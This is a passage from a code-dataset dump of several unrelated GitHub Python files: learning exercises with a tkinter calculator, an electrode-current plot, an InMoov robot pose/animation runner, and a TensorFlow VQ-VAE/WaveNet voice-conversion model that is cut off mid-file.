**mean_iou_dict\r\n }\r\n\r\n # ('ap', 'best_fgiou', 'best_miou', 'fgiou0.5', 'fgiou0.1', 'mean_iou_0p5', 'mean_iou_0p1', 'best_biniou', 'biniou_0.5', 'fgiou_thresh'\r\n\r\n # return ap, best_fgiou, best_mean_iou, iou_0p5, iou_0p1, mean_iou_0p5, mean_iou_0p1, best_biniou, biniou0p5, best_fgiou_thresh, {'summed': summed, 'summed_by_cls': summed_by_cls}\r\n\r\n","repo_name":"deforum-art/sd-webui-deforum","sub_path":"scripts/deforum_helpers/src/clipseg/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":10877,"program_lang":"python","lang":"en","doc_type":"code","stars":2274,"dataset":"github-code","pt":"16"} +{"seq_id":"24245779784","text":"#num1 = int(input(\"Type num1: \"))\n#num2 = int(input(\"Type num2: \"))\n\n#num3 = num1 * num2\n#print(num3)\n\n#def Hello():\n# print(\"Nampc\")\n# print(\"1618\")\n#Hello()\n\n#def Main():\n# print(\"Started\")\n# output = getInteger()\n# print(\"Number entered is: \",output)\n \n#def getInteger():\n# result = int(input(\"Enter integer: \"))\n# return result\n\n#if(__name__==\"__main__\"):\n# Main()\n\n#def CountNum():\n# for num in range(10):\n# if(num > 5 or num < 2):\n# print(num)\n \n#def mainTest():\n# CountNum()\n\n#if(__name__==\"__main__\"):\n# mainTest()\n\n\n#import math\n\n#def Main():\n# num = -85\n # fabs is used to get the absolute\n # value of a decimal\n# num = math.fabs(num)\n# print(num)\n \n#if __name__ == \"__main__\":\n# Main()\n\n# Python program to illustrate a list\n\n# create a empty list\n#nums = []\n# appending data in list\n#nums.append(1.618)\n#nums.append(\"Nampc\")\n#nums.append(\"dz\")\n#nums.append(22)\n\n#print(nums)\n\n# create a empty dict\n#Dict = []\n\n# putting integer values\n#Dict = {1: 'Vietnames', 2: 'English', 3: 'Catonese'}\n#print(Dict[1])\n\n#tup = ('Vietnamese', 22, \"Chinese\", 1.618)\n#print(tup[3])\n\n# import keyword as kw\n\n# print(\"The list of keywords is: \")\n# print(kw.kwlist)\n\n# print(False == 0)\n# print(True == 1)\n\n# print(True + True + True)\n# print(True + False + False)\n\n# print(None == 0)\n# print(None == [])\n\n# print(True or False) # Return True\n\n# print(False and True) # Return False\n\n# print(not True) # Return False\n\n# # Using \"in\" to check\n# if 's' in 'Nampcs':\n# print(\"s is part of Nampcs\")\n# else:\n# print(\"s is not part of Nampcs\")\n\n# # Using \"in\" to loop through\n# for i in 'Nampcs1.618':\n# print(i, end=\";\")\n\n# print(\"\\r\")\n\n# # using is to check object identify\n# # string is immutable(cannot be changed once allocated)\n# # hence occupy same memory location\n# print(' ' is ' ')\n\n# # using is to check object identify\n# # dictionary is mutable(can be changed once allocated)\n# # hence occupy different memory location\n# print({} is {})\n\n# for i in range(10):\n# print(i, end=\" \")\n# if i == 6:\n# break\n# print()\n# i = 0\n# while i < 10:\n# if i == 6:\n# i += 1\n# continue\n# else:\n# print(i,end=\" \")\n# i += 1\n# print()\n# j = 20\n# if j == 10:\n# print(\"j is 10\")\n# elif i == 20:\n# print(\"j is 20\")\n# else:\n# print(\"j is not present\")\n\n# Return keyword\n# def fun():\n# S = 0\n \n# for i in range(10):\n# S += i\n# return S\n# print(fun())\n\n# Yield keyword\n# def fun():\n# S = 0\n \n# for i in range(10):\n# S += i\n# yield S\n# for i in fun():\n# print(i)\n\n# class Keyword\n# class Dog:\n# attr1 = \"mammal\"\n# attr2 = \"dog\"\n \n# def fun(self):\n# print(\"I'm a\", self.attr1)\n# print(\"I'm a\", self.attr2)\n# Rodger = Dog()\n\n# print(Rodger.attr1)\n# Rodger.fun()\n\n# class Student:\n# def 
__init__(self, id, name, age):\n# self.id = id\n# self.name = name\n# self.age = age\n# def __str__(self):\n# return f\"[{self.id}] - {self.name} ({self.age} age)\"\n# def __sizeof__(self):\n# return 100\n# def myFunc(self):\n# print(\"Hello my name is \"+self.name)\n \n# student1 = Student(1618, \"Nampc\", 30)\n# student1.id = 1\n# student1.name = \"Nampcs\"\n# print(student1)\n# print(student1.__sizeof__())\n# print(student1.myFunc())\n\n# using with statement\n# file_path = \".\\\\test.txt\"\n# with open(file_path, 'w') as file:\n# file.write(\"Nampc\")\n\n# import math as gfg\n\n# print(gfg.factorial(5))\n\n# n = 10\n# for i in range(n):\n# # do something\n# pass\n\n# ld = lambda x: x*x*x\n# ld2 = lambda y:(y + 20) * 10\n# print(ld(10))\n# print(ld2(12))\n\n# import math\n# print(math.factorial(10))\n\n# from math import factorial\n# print(factorial(20))\n\n# a = 4\n# b = 0\n\n# try:\n# k = a//b # raise divide by zero exception\n# print(k)\n# except ZeroDivisionError:\n# print(\"Can't divide by zero\")\n# finally:\n# print(\"This is always executed\")\n\n# print(\"The value of a / b is: \")\n# assert b != 0, \"Divide by 0 error\"\n# print(a/b)\n\n# var1 = 20\n# var2 = \"Nampc\"\n\n# print(var1)\n# print(var2)\n\n# del var1\n# del var2\n\n# print(var1)\n# print(var2)\n\n\n# a = 15 # global varibale\n# b = 10 # global variable\n\n# def add():\n# c = a + b\n# print(c)\n# add()\n\n# def fun():\n# var1 = 10\n# def gun():\n# nonlocal var1\n# var1 = var1 + 10\n# print(var1)\n# print(var1)\n# gun()\n# fun()\n\n# import keyword\n\n# keys = [\"for\", \"while\", \"Nampc\", \"break\", \"elif\", \"assert\", \"Catonese\", \"lambda\", \"None\", \"and\", \"global\"\n# ,\"finally\", \"nonlocal\", \"pass\", \"continue\", \"HappyNewYear\"]\n\n# for i in range(len(keys)):\n# # checking which are keywords\n# if keyword.iskeyword(keys[i]):\n# print(keys[i] + \" is python keyword\")\n# else:\n# print(keys[i] + \" is not python keyword\")\n\n# print(keyword.kwlist)\n# print(keyword.kwlist.__len__())\n\n# import sys\n\n# sys.stdout.write(\"Nampcs \")\n# sys.stdout.write(\"is the best company about technology in North Vietnam \")\n\n# lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n# print(*lst)\n\n# print(\"Nampc\",end=\" \")\n# print(\"NampcNampcs\")\n\n# arr = [1, 2, 3, 4, 5]\n# for i in range(5):\n# print(arr[i], end=\" \")\n\n# ----------------- CALCULATOR --------------------\nimport tkinter as tk\nimport tkinter.messagebox\nfrom tkinter.constants import SUNKEN\n\nwindow = tk.Tk()\nwindow.title(\"Calculator-Nampc\")\nframe = tk.Frame(master=window, bg=\"skyblue\", padx=10)\nframe.pack()\nentry = tk.Entry(master=frame, relief=SUNKEN, borderwidth=3, width=30)\nentry.grid(row=0,column=0, columnspan=3, ipady=2, pady=2)\n\ndef myClick(number):\n entry.insert(tk.END, number)\n \ndef equal():\n try:\n y = str(eval(entry.get()))\n entry.delete(0, tk.END)\n entry.insert(0, y)\n except:\n tkinter.messagebox.showerror(\"Error\", \"Syntax Error\")\ndef clear():\n entry.delete(0, tk.END)\n\nbutton_1 = tk.Button(master=frame, text='1', padx=15,\n pady=5, width=3, command=lambda: myClick(1))\nbutton_1.grid(row=1, column=0, pady=2)\nbutton_2 = tk.Button(master=frame, text='2', padx=15,\n pady=5, width=3, command=lambda: myClick(2))\nbutton_2.grid(row=1, column=1, pady=2)\nbutton_3 = tk.Button(master=frame, text='3', padx=15,\n pady=5, width=3, command=lambda: myClick(3))\nbutton_3.grid(row=1, column=2, pady=2)\nbutton_4 = tk.Button(master=frame, text='4', padx=15,\n pady=5, width=3, command=lambda: myClick(4))\nbutton_4.grid(row=2, 
column=0, pady=2)\nbutton_5 = tk.Button(master=frame, text='5', padx=15,\n pady=5, width=3, command=lambda: myClick(5))\nbutton_5.grid(row=2, column=1, pady=2)\nbutton_6 = tk.Button(master=frame, text='6', padx=15,\n pady=5, width=3, command=lambda: myClick(6))\nbutton_6.grid(row=2, column=2, pady=2)\nbutton_7 = tk.Button(master=frame, text='7', padx=15,\n pady=5, width=3, command=lambda: myClick(7))\nbutton_7.grid(row=3, column=0, pady=2)\nbutton_8 = tk.Button(master=frame, text='8', padx=15,\n pady=5, width=3, command=lambda: myClick(8))\nbutton_8.grid(row=3, column=1, pady=2)\nbutton_9 = tk.Button(master=frame, text='9', padx=15,\n pady=5, width=3, command=lambda: myClick(9))\nbutton_9.grid(row=3, column=2, pady=2)\nbutton_0 = tk.Button(master=frame, text='0', padx=15,\n pady=5, width=3, command=lambda: myClick(0))\nbutton_0.grid(row=4, column=1, pady=2)\n \nbutton_add = tk.Button(master=frame, text=\"+\", padx=15,\n pady=5, width=3, command=lambda: myClick('+'))\nbutton_add.grid(row=5, column=0, pady=2)\n \nbutton_subtract = tk.Button(\n master=frame, text=\"-\", padx=15, pady=5, width=3, command=lambda: myClick('-'))\nbutton_subtract.grid(row=5, column=1, pady=2)\n \nbutton_multiply = tk.Button(\n master=frame, text=\"*\", padx=15, pady=5, width=3, command=lambda: myClick('*'))\nbutton_multiply.grid(row=5, column=2, pady=2)\n \nbutton_div = tk.Button(master=frame, text=\"/\", padx=15,\n pady=5, width=3, command=lambda: myClick('/'))\nbutton_div.grid(row=6, column=0, pady=2)\n \nbutton_clear = tk.Button(master=frame, text=\"clear\",\n padx=15, pady=5, width=12, command=clear)\nbutton_clear.grid(row=6, column=1, columnspan=2, pady=2)\n \nbutton_equal = tk.Button(master=frame, text=\"=\", padx=15,\n pady=5, width=9, command=equal)\nbutton_equal.grid(row=7, column=0, columnspan=3, pady=2)\n\nwindow.mainloop()","repo_name":"nampc1618/Summary_Python","sub_path":"Learn_Py.py","file_name":"Learn_Py.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1218535226","text":"from matplotlib import pyplot as plt \nimport numpy as np\nfrom scipy.special import pbwa\n\ndef U(a,x):\n return pbwa(a,x)[0]\n\nT = np.linspace(5e-2,3,num=300)\nJ_lin = 1/(np.sqrt(T*np.pi))\nJ_sph = (1+np.sqrt(T*np.pi))/(np.sqrt(T*np.pi))\nJ_band = (np.pi*T)**(-0.5) + 1.0 - ((2.0**0.75)/np.pi)*(T**0.75)*np.exp(-1.0/(8.0*T)) * (U(2.0,(2.0*T)**(-0.5)))\nplt.plot(T,J_lin,label='Linear')\nplt.plot(T,J_sph,label='spherical')\nplt.plot(T,J_band,label='Band electrode')\nplt.legend()\n\nplt.show()\n\n","repo_name":"nmerovingian/PINN-Voltammetry-Best-Practices","sub_path":"Chronoamperometry at a Microband Electrode/microband analytical.py","file_name":"microband analytical.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"36266281414","text":"\nimport time\nfrom os.path import join, dirname\nimport sys\nwhereami = dirname(__file__)\nscripts_dir= join(whereami, \"../scripts/\")\nsys.path.append(scripts_dir)\nfrom json_parsing import read_json\nimport Inmoov\n\nfilename_pose = join(whereami, '../json/pose.json')\nfilename_animation = join(whereami, '../json/animations.json')\n\n# global objects that hold the json file contents\n# so i can control when/how often to read the json file\n# in the inmoov object, when it receives messages, it only needs to update at bootup. 
json will not change after bootup.\n# in the gui, it should update each time it tries to run, because the gui is editing the files.\nglobal_poses = None\nglobal_animations = None\n\ndef update_animations():\n global global_animations\n global_animations = read_json(filename_animation)\ndef update_poses():\n global global_poses\n global_poses = read_json(filename_pose)\n\n\n# TODO: if we are keeping the killlist idea, make it cleaner & easy to remove when transferring to a robot that doesn't need it\n# TODO: be more intelligent about when we need to read the animation/pose json files\n\n\ndef do_animation(the_inmoov, animation_name):\n update_animations()\n print(\"Executing animation \", str(animation_name))\n\n if animation_name not in global_animations:\n print(\"FAIL TO FIND: ANIMATION '%s'\" % str(animation_name))\n return\n\n #for key, pose_info in sorted(animation_data[animation_name].items()):\n # this method better supports animations >= 10 frames long\n # because using sorted() on 1-12 returns [1, 10, 11, 12, 2, 3, 4, 5, etc]\n this_animation_dict = global_animations[animation_name]\n t = 1\n while str(t) in this_animation_dict:\n # pose_info is a list with item0 = posename and item1 = holdtime\n pose_info = this_animation_dict[str(t)]\n print(\"\\n********* Executing pose {} *********\\n\".format(str(pose_info[0])))\n do_pose(the_inmoov, pose_info[0], pose_info[1])\n t += 1\n print(\"\\nANIMATION COMPLETE!\\n\")\n\n#killtime = 1\nkilllist = [\"left_shoulder_lift_front\",\"left_arm_rotate\",\"right_arm_rotate\",\"right_shoulder_lift_front\"]\n\ndef do_pose(the_inmoov, pose_name, hold_time=0):\n killtime = 1\n update_poses()\n if pose_name not in global_poses:\n print(\"FAIL TO FIND: POSE '%s'\" % str(pose_name))\n return\n hold_time = float(hold_time)\n pose_data = global_poses[pose_name]\n for servo_name, servo_angle in pose_data.items():\n #Obtain a handle to the actual servo object\n fservo = the_inmoov.find_servo_by_name(str(servo_name))\n if fservo.curr_angle == servo_angle:\n # if telling it to move to a position it's already at, skip it instead, it doesnt need to move\n print('Skipping', servo_name)\n else:\n fservo.rotate(float(servo_angle))\n print('Setting {} servo to an angle of {}'.format(servo_name, servo_angle))\n# if servo_name == 'right_lift_front':\n# killtime = abs((7.5/90)*(fservo.curr_angle - servo_angle))\n if hold_time != 0:\n print('\\n--------------- Hold for {} second(s) ---------------'.format(hold_time))\n\n# # todo: handle corner case where hold_time < killtime\n# time.sleep(killtime)\n# # kill all servos that can safely hold position wihtout power\n# for killname in killlist:\n# fservo = this_inmoov.find_servo_by_name(str(killname))\n# fservo.off()\n# time.sleep(hold_time - killtime)\n time.sleep(hold_time)\n \n\nif __name__ == '__main__':\n this_inmoov = Inmoov.Inmoov()\n \n do_animation(this_inmoov, 'rps_paper')\n time.sleep(5)\n exit()\n do_animation(this_inmoov, 'headright_anim')\n time.sleep(5)\n do_animation(this_inmoov, 'headleft_anim')\n time.sleep(5)\n do_animation(this_inmoov, 'headright_anim')\n time.sleep(5)\n","repo_name":"mish3albaiz/Robotics_ECE579","sub_path":"inmoov/scripts/animation_executor.py","file_name":"animation_executor.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29352650732","text":"import sys\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport librosa\nimport math\n\nsys.path.append('../wavenet')\nfrom 
wavenet.model import WaveNetModel\nfrom utils import inv_mu_law_numpy, mu_law_numpy\nfrom wavenet.ops import mu_law_encode as mu_law\n\n\ndef create_variable(name, shape):\n '''Create a convolution filter variable with the specified name and shape,\n and initialize it using Xavier initialition.'''\n initializer = tf.contrib.layers.xavier_initializer()\n variable = tf.get_variable(name, shape, initializer=initializer)\n return variable\n\ndef create_bias_variable(name, shape):\n '''Create a bias variable with the specified name and shape and initialize\n it to zero.'''\n initializer = tf.constant_initializer(value=0.0, dtype=tf.float32)\n variable = tf.get_variable(name, shape, initializer=initializer)\n return variable\n\ndef create_embedding_table(name, shape):\n if shape[0] == shape[1]:\n # Make a one-hot encoding as the initial value.\n initial_val = np.identity(n=shape[0], dtype=np.float32)\n variable = tf.get_variable(name, initializer=initial_val)\n return variable\n else:\n return create_variable(name, shape)\n\ndef get_bilinear_filter(filter_shape, upscale_factor, name=None):\n ##filter_shape is [width, height, num_in_channels, num_out_channels]\n kernel_size = filter_shape[0]\n ### Centre location of the filter for which value is calculated\n if kernel_size % 2 == 1:\n centre_location = upscale_factor - 1\n else:\n centre_location = upscale_factor - 0.5\n\n bilinear = np.zeros([filter_shape[0], filter_shape[1]])\n for x in range(filter_shape[0]):\n for y in range(filter_shape[1]):\n ##Interpolation Calculation\n value = (1 - abs((x - centre_location)/ upscale_factor)) * (1 - abs((y - centre_location)/ upscale_factor))\n bilinear[x, y] = value\n\n weights = np.zeros(filter_shape)\n for i in range(filter_shape[2]):\n for j in range(filter_shape[3]):\n weights[:, :, i, j] = bilinear\n init = tf.constant_initializer(value=weights,\n dtype=tf.float32)\n\n bilinear_weights = tf.get_variable(name=name, initializer=init,\n shape=weights.shape)\n return bilinear_weights \n \nclass VQVAE:\n def __init__(self,\n batch_size=None, sample_size=None, q_factor=1, n_stack=2, max_dilation=10, K=512, D=128,\n lr=0.001, use_gc=False, gc_cardinality=None, is_training=True, global_step=None,\n scope='params', residual_channels=256, dilation_channels=512, skip_channels=256, use_biases=False,\n upsampling_method='deconv', encoding_channels=[2, 4, 8, 16, 32, 1]):\n\n assert sample_size is not None\n assert q_factor == 1 or (q_factor % 2) == 0\n\n self.filter_width = 2\n self.dilations = [2 ** i for j in range(n_stack) for i in range(max_dilation)]\n self.receptive_field = (self.filter_width - 1) * sum(self.dilations) + 1\n self.receptive_field += self.filter_width - 1\n\n self.q_factor = q_factor\n self.quantization_channels = 256 * q_factor\n\n self.K = K\n self.D = D \n self.use_gc = use_gc\n self.gc_cardinality = gc_cardinality\n self.use_biases = use_biases\n\n # encoding spec\n self.encode_level = 6\n self.encoding_channels = encoding_channels\n\n # model spec\n self.upsampling_method = upsampling_method\n self.is_training = is_training\n self.train_op = None\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.reduced_timestep = None\n self.initialized = False\n if batch_size is not None and sample_size is not None:\n self.reduced_timestep = int(np.ceil(self.sample_size / 2 ** self.encode_level))\n self.initialized = True\n\n # etc\n self.drop_rate = 0.5\n self.global_step = global_step\n self.lr = lr\n\n \n with tf.variable_scope(scope) as params:\n self.enc_var, self.enc_scope = 
self.create_encoder_variables()\n with tf.variable_scope('decoder') as dec_param_scope:\n \n self.deconv_var = self.create_deconv_variables()\n self.wavenet = WaveNetModel(batch_size=batch_size,\n dilations=self.dilations,\n filter_width=self.filter_width,\n residual_channels=residual_channels,\n dilation_channels=dilation_channels,\n quantization_channels=self.quantization_channels,\n skip_channels=skip_channels,\n global_condition_channels=gc_cardinality,\n global_condition_cardinality=gc_cardinality,\n use_biases=use_biases)\n \n self.dec_scope = dec_param_scope\n \n with tf.variable_scope('embed'):\n init = tf.truncated_normal_initializer(stddev=0.01)\n# init = tf.constant_initializer(value=np.random.random((self.K, self.D)), dtype=tf.float32) \n self.embeds = tf.get_variable(\n 'embedding', [self.K, self.D], dtype=tf.float32,\n initializer=init) \n \n self.param_scope = params\n self.saver = None\n self.set_saver()\n \n def create_deconv_variables(self):\n var = None\n if self.upsampling_method.startswith('deconv'):\n var = list()\n \n tokens = self.upsampling_method.split('-')\n n_step = tokens[0].split('deconv')[1]\n\n out_channel = int(tokens[1]) if len(tokens) > 1 else 1\n\n if not n_step:\n n_step = 1\n else:\n n_step = int(n_step)\n\n assert n_step < 4\n\n height, width = self.reduced_timestep, self.D\n upscale_factor = 2 ** self.encode_level\n\n if n_step == 1:\n upscale_per_step = upscale_factor\n elif n_step == 2:\n upscale_per_step = int(np.sqrt(upscale_factor))\n elif n_step == 3:\n upscale_per_step = int(np.cbrt(upscale_factor))\n\n h = height\n in_channel = 1\n for step in range(n_step):\n with tf.variable_scope('deconv_layer_{}'.format(step)):\n layer = dict()\n\n h *= upscale_per_step\n\n kernel_size = 2*upscale_per_step - upscale_per_step%2\n# layer['filter'] = create_variable('deconv_layer_filter', [kernel_size, 1, out_channel, in_channel])\n layer['filter'] = get_bilinear_filter([kernel_size, 1, out_channel, in_channel], \n upscale_per_step, name='deconv_layer_filter')\n layer['strides'] = [1, upscale_per_step, 1, 1]\n layer['shape'] = [self.batch_size, h, width, out_channel]\n if self.use_biases:\n layer['bias'] = create_bias_variable('deconv_bias', [out_channel])\n var.append(layer) \n \n in_channel = out_channel\n out_channel = out_channel * 2\n return var\n \n def initialize(self, input_batch, sample_size=40960):\n # TODO\n self.batch_size = tf.shape(input_batch)[0]\n self.sample_size = sample_size\n self.reduced_timestep = int(np.ceil(self.sample_size / 2 ** self.encode_level))\n self.initialized = True\n\n def set_saver(self):\n if self.saver is None:\n save_vars = {('train/' + '/'.join(var.name.split('/')[1:])).split(':')[0]: var for var in\n tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.param_scope.name)}\n# for name,var in save_vars.items():\n# print(name)\n self.saver = tf.train.Saver(var_list=save_vars, max_to_keep=10)\n\n def _gc_embedding(self):\n return create_embedding_table('gc_embedding', [self.gc_cardinality, self.gc_cardinality])\n \n def create_encoder_variables(self):\n with tf.variable_scope('enc') as enc_param_scope: \n var = dict()\n\n input_channel = 1\n output_channel = self.encoding_channels\n \n var['enc_conv_stack'] = list()\n for i in range(self.encode_level):\n with tf.variable_scope('encoder_conv_{}'.format(i)):\n current = dict()\n if i < self.q_factor:\n current['filter'] = create_variable('filter', [4, 4, input_channel, output_channel[i]]) \n else:\n current['filter'] = create_variable('filter', [4, 1, input_channel, 
output_channel[i]]) \n if self.use_biases:\n current['bias'] = create_bias_variable('bias', [output_channel[i]])\n input_channel = output_channel[i]\n var['enc_conv_stack'].append(current)\n return var, enc_param_scope\n\n def encode(self, encoded_input_batch):\n encoded_input_batch = tf.expand_dims(encoded_input_batch, -1)\n \n out = encoded_input_batch\n\n for i, layer in enumerate(self.enc_var['enc_conv_stack']):\n kernel = layer['filter']\n if i < self.q_factor:\n out = tf.nn.conv2d(out, kernel, [1, 2, 2, 1], padding='SAME')\n else:\n out = tf.nn.conv2d(out, kernel, [1, 2, 1, 1], padding='SAME')\n \n if self.use_biases:\n out = tf.nn.bias_add(out, layer['bias'])\n\n if i < (self.encode_level-1):\n out = tf.nn.elu(out)\n# out = tf.layers.dropout(out, rate=self.drop_rate, training=self.is_training ,name='enc_dropout_%d' % (i))\n \n if self.encoding_channels[-1] > 1:\n z_e = tf.reduce_sum(out, -1)\n else:\n z_e = tf.squeeze(out, axis=-1, name='encode_squeeze')\n \n z_e = tf.nn.tanh(z_e)\n\n return z_e\n \n def upsampling(self, z_q):\n dec_input = tf.expand_dims(z_q, -1)\n initial = tf.image.resize_nearest_neighbor(dec_input, [self.sample_size, self.D])\n initial = tf.squeeze(initial, axis=-1, name='dec_input_squeeze') \n \n if self.deconv_var is not None:\n for i, layer in enumerate(self.deconv_var):\n dec_input = tf.nn.conv2d_transpose(\n dec_input,\n layer['filter'],\n layer['shape'],\n layer['strides'],\n padding='SAME',\n data_format='NHWC',\n name=None\n )\n \n if self.use_biases:\n dec_input = tf.nn.bias_add(dec_input, layer['bias'])\n \n if i < len(self.deconv_var)-1:\n dec_input = tf.layers.batch_normalization(dec_input, training=self.is_training)\n dec_input = tf.nn.tanh(dec_input)\n# dec_input = tf.nn.elu(dec_input)\n \n dec_input = tf.reduce_sum(dec_input, -1)\n dec_input = tf.add(dec_input, initial)\n else:\n dec_input = initial\n \n return dec_input\n\n def vq(self, z_e):\n _e = tf.reshape(self.embeds, [1, self.K, self.D])\n _e = tf.tile(_e, [self.batch_size, self.reduced_timestep, 1])\n\n _t = tf.tile(z_e, [1, 1, self.K])\n _t = tf.reshape(_t, [self.batch_size, self.reduced_timestep * self.K, self.D])\n\n dist = tf.norm(_t - _e, axis=-1)\n dist = tf.reshape(dist, [self.batch_size, -1, self.K])\n k = tf.argmin(dist, axis=-1)\n z_q = tf.gather(self.embeds, k)\n\n return z_q\n \n def get_condition(self, input_batch, gc=None):\n with tf.variable_scope('forward'):\n encoded_input_batch, gc = self.preprocess(input_batch, gc=gc)\n self.encoded_input_batch = encoded_input_batch\n self.gc = gc\n\n # encoding\n z_e = self.encode(encoded_input_batch)\n\n # VQ-embedding\n z_q = self.vq(z_e)\n\n # decoding\n lc = self.upsampling(z_q) \n return lc, gc\n\n def create_model(self, padded_input, gc=None):\n with tf.variable_scope('forward'):\n \n padded_encoded_input, gc = self.preprocess(padded_input, gc=gc)\n self.gc = gc\n \n # Cut off the last sample of network input to preserve causality.\n wavenet_input_width = tf.shape(padded_encoded_input)[1] - 1\n wavenet_input = tf.slice(padded_encoded_input, [0, 0, 0],\n [-1, wavenet_input_width, -1]) \n \n encoded_input = tf.slice(padded_encoded_input, \n [0, self.receptive_field, 0], \n [-1, -1, -1], name=\"remove_pad\")\n \n self.encoded_input = encoded_input\n \n # encoding\n self.z_e = self.encode(encoded_input)\n\n # VQ-embedding\n self.z_q = self.vq(self.z_e)\n\n # decoding\n lc = self.upsampling(self.z_q)\n self.lc = lc\n \n paddings = tf.constant([[0, 0], [self.receptive_field - 1, 0], [0, 0]])\n lc = tf.pad(lc, paddings, \"CONSTANT\")\n 
\n output = self.wavenet._create_network(wavenet_input, lc, gc)\n\n return output\n \n def generate_waveform(self, sess, n_samples, lc, gc, seed=None, use_randomness=True):\n sample_placeholder = tf.placeholder(tf.int32)\n lc_placeholder = tf.placeholder(tf.float32)\n gc_placeholder = tf.placeholder(tf.float32)\n next_sample_probs = self.wavenet.predict_proba_incremental(sample_placeholder,\n lc_placeholder,\n gc_placeholder)\n sess.run(self.wavenet.init_ops)\n\n operations = [next_sample_probs]\n operations.extend(self.wavenet.push_ops)\n \n waveform = [128] * (self.receptive_field - 2)\n waveform = np.tile(waveform, (self.batch_size, 1))\n if seed is None:\n seed = []\n for i in range(self.batch_size):\n _seed = np.random.randint(self.quantization_channels) if use_randomness else 128\n seed.append([_seed])\n \n waveform = np.hstack([waveform, seed])\n\n for i in range(waveform.shape[1]-1):\n sample = waveform[:, i]\n lc_sample = np.zeros((self.batch_size, 128))\n sess.run(operations, feed_dict={sample_placeholder: sample,\n lc_placeholder: lc_sample,\n gc_placeholder: gc})\n \n softmax_result = []\n for i in range(n_samples):\n if i > 0 and i % 10000 == 0:\n print(\"Generating {} of {}.\".format(i, n_samples))\n sys.stdout.flush()\n\n sample = waveform[:, -1]\n lc_sample = lc[:, i, :].reshape(self.batch_size, -1)\n results = sess.run(operations, feed_dict={sample_placeholder: sample,\n lc_placeholder: lc_sample,\n gc_placeholder: gc})\n \n softmax_result.append(np.expand_dims(results[0], 1))\n if use_randomness:\n sample = []\n for k in range(self.batch_size):\n _sample = np.random.choice(np.arange(self.quantization_channels), p=results[0][k,:])\n sample.append([_sample])\n else:\n sample = np.argmax(results[0], axis=1).reshape(-1, 1)\n \n waveform = np.hstack([waveform, sample])\n\n waveform = waveform[:, self.receptive_field:]\n softmax_result = np.hstack(softmax_result)\n return waveform, softmax_result\n\n def _one_hot_encode(self, input_batch):\n with tf.name_scope('one_hot_encode'):\n encoded = tf.one_hot(input_batch, depth=self.quantization_channels) \n encoded = tf.reshape(encoded, [self.batch_size, -1, self.quantization_channels])\n\n return encoded\n \n def preprocess(self, input_batch, gc=None):\n if not self.initialized:\n self.initialize(input_batch)\n \n encoded = mu_law(input_batch, quantization_channels=self.quantization_channels)\n encoded = self._one_hot_encode(encoded)\n \n # gc-embedding\n if self.use_gc and gc is not None:\n gc_embedding_table = self._gc_embedding()\n gc = tf.nn.embedding_lookup(gc_embedding_table, gc)\n gc = tf.reshape(gc, [self.batch_size, 1, self.gc_cardinality], name=\"gc_embbedding_resize\")\n\n return encoded, gc\n \n def loss_recon(self, mu_law_output, encoded_target, beta=0.25):\n encoded_output = self._one_hot_encode(mu_law_output)\n \n output = encoded_output\n target = encoded_target\n \n target = tf.slice(target, [0, 1, 0], [-1, -1, -1], name=\"loss_recon_slice_target\")\n recon = tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=target)\n recon = tf.reduce_mean(recon)\n \n return recon\n \n def loss(self, output, beta=0.25):\n recon = tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=self.encoded_input)\n recon = tf.reduce_mean(recon)\n \n z_q = self.z_q\n z_e = self.z_e\n\n vq = tf.reduce_mean(tf.norm(tf.stop_gradient(z_e) - z_q, axis=-1) ** 2)\n commit = tf.reduce_mean(tf.norm(z_e - tf.stop_gradient(z_q), axis=-1) ** 2)\n \n loss = (recon + vq + beta * commit)\n \n if self.is_training:\n with 
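preprocess() above calls a mu_law helper (and the generator uses inv_mu_law_numpy) that are imported from elsewhere in the repository and not shown here. As an assumed reference, a standard mu-law companding pair for waveforms in [-1, 1] looks like this:

import numpy as np

def mu_law_encode(x, quantization_channels=256):
    mu = quantization_channels - 1
    y = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)
    return ((y + 1) / 2 * mu + 0.5).astype(np.int32)     # integers in [0, mu]

def mu_law_decode(q, quantization_channels=256):
    mu = quantization_channels - 1
    y = 2.0 * q / mu - 1.0
    return np.sign(y) * ((1.0 + mu) ** np.abs(y) - 1.0) / mu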
tf.variable_scope('backward'):\n # Decoder Grads\n decoder_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.dec_scope.name)\n decoder_grads = list(zip(tf.gradients(loss, decoder_vars), decoder_vars))\n\n # Encoder Grads\n encoder_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.enc_scope.name)\n grad_z = tf.gradients(recon, z_q)\n encoder_grads = [(tf.gradients(z_e, _var, grad_z)[0] + beta * tf.gradients(commit, _var)[0], _var)\n for _var in encoder_vars]\n\n # Embedding Grads\n embed_grads = list(zip(tf.gradients(vq, self.embeds), [self.embeds]))\n\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.apply_gradients(decoder_grads + encoder_grads + embed_grads, global_step=self.global_step)\n \n return loss, recon\n\n def load(self, sess, model):\n self.saver.restore(sess, model)\n\n def save(self, sess, logdir, step):\n model_name = 'model.ckpt'\n checkpoint_path = os.path.join(logdir, model_name)\n print('Storing checkpoint to {} ...'.format(logdir), end=\"\")\n sys.stdout.flush()\n\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n\n self.saver.save(sess, checkpoint_path, global_step=step)\n print(' Done.')\n\n\nclass VoiceConverter:\n def __init__(self, model, checkpoint_path=None,\n batch_size=1, sample_size=40960, sample_rate=16000, session_config=None):\n\n self.sample_size = sample_size\n self.sample_rate = sample_rate\n self.batch_size = batch_size\n self.silence_threshold = 0.0\n\n self.model = model\n\n self.input_batch = tf.placeholder(tf.float32)\n self.gc_batch = tf.placeholder(tf.int32)\n\n self.lc, self.gc = 